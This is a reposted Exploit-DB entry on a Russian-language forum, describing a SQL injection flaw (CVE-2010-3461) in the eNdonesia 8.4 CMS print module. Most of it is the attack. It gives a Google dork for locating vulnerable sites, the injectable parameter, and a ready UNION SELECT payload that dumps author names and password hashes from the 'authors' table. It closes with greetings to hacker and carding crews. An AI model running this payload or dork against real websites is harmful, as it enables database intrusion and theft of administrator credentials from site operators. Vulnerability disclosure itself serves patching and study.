- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 15006
- Проверка EDB
-
- Пройдено
- Автор
- VYC0D
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2010-3461
- Дата публикации
- 2010-09-15
Код:
======================================================================/
eNdonesia 8.4 (Print Module) SQL Injection Vulnerability
Download : http://sourceforge.net/projects/endonesia/files/eNdonesia
Version : 8.4 or lower maybe also affected
Dork : mod.php?mod=publisher&op=printarticle&artid=
======================================================================/
Author : vYc0d
Contact : [email protected]
Site : http://vyc0d.uni.cc
Date : 15-10-2010
==============================================================================================/
[Vulnerability File]
http://localhost/[eNdonesia 8.4]/mod.php?mod=publisher&op=printarticle&artid=[valid id][sql-i]
[ DEMO ]
http://www.site.com/mod.php?mod=publisher&op=printarticle&artid=-47+union+select+1,concat_ws%280x3a,aid,name,pwd%29,3,4,5,6,7+from+authors--
===================================================================================================================================================/
[ Thanks to ]
[-] Allah SWT, Muhammad SAW, My Family
[-] The big Family of :
[-] M0slem Hax0r - Echo - Indonesian Coder - Jasakom - Indonesian Hackers - Malang Cyber Crew
[-] ManadoCoding - Devilzc0de - Yogyacarderlink - Xcode - Hacker Newbie - Persiland Security
[-] Klix ITN Malang - Kolam (Komunitas Linux Arek Malang)
- Источник
- www.exploit-db.com